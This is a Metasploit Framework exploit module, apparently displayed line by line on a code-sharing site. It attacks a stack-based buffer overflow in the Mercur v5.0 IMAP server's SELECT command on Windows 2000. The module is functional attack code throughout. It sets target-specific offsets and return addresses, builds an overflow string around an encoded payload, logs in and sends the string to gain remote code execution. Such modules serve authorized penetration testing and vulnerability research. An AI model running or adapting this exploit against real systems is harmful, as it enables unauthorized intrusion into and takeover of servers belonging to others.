Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/imap/mercur_imap_select_overflow.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Imap

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow',

16
        'Description' => %q{

17
          Mercur v5.0 IMAP server is prone to a remotely exploitable

18
          stack-based buffer overflow vulnerability. This issue is due

19
          to a failure of the application to properly bounds check

20
          user-supplied data prior to copying it to a fixed size memory buffer.

21
          Credit to Tim Taylor for discover the vulnerability.

22
        },

23
        'Author' => [ 'Jacopo Cervini <acaro[at]jervus.it>' ],

24
        'License' => BSD_LICENSE,

25
        'References' => [

26
          [ 'CVE', '2006-1255' ],

27
          [ 'OSVDB', '23950' ],

28
          [ 'BID', '17138' ],

29
        ],

30
        'Privileged' => true,

31
        'DefaultOptions' => {

32
          'EXITFUNC' => 'process',

33
        },

34
        'Payload' => {

35
          'Space' => 400,

36
          'BadChars' => "\x00",

37
          'StackAdjustment' => -3500,

38


39
        },

40
        'Platform' => 'win',

41
        'Targets' => [

42
          ['Windows 2000 Server SP4 English', { 'Offset' => 126, 'Ret' => 0x13e50b42 }],

43
          ['Windows 2000 Pro SP1 English', { 'Offset' => 127, 'Ret' => 0x1446e242 }],

44
        ],

45
        'DefaultTarget' => 0,

46
        'DisclosureDate' => '2006-03-17',

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54
  end

55


56
  def exploit

57
    sploit = "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20"

58
    sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset'])

59
    sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8)

60
    sploit << payload.encoded + rand_text_alpha_upper(453)

61


62
    info = connect_login

63


64
    if (info == true)

65
      print_status("Trying target #{target.name} using heap address at 0x%.8x..." % target.ret)

66
      sock.put(sploit + "\r\n")

67
    else

68
      print_status("Not falling through with exploit")

69
    end

70


71
    handler

72
    disconnect

73
  end

74
end

75


76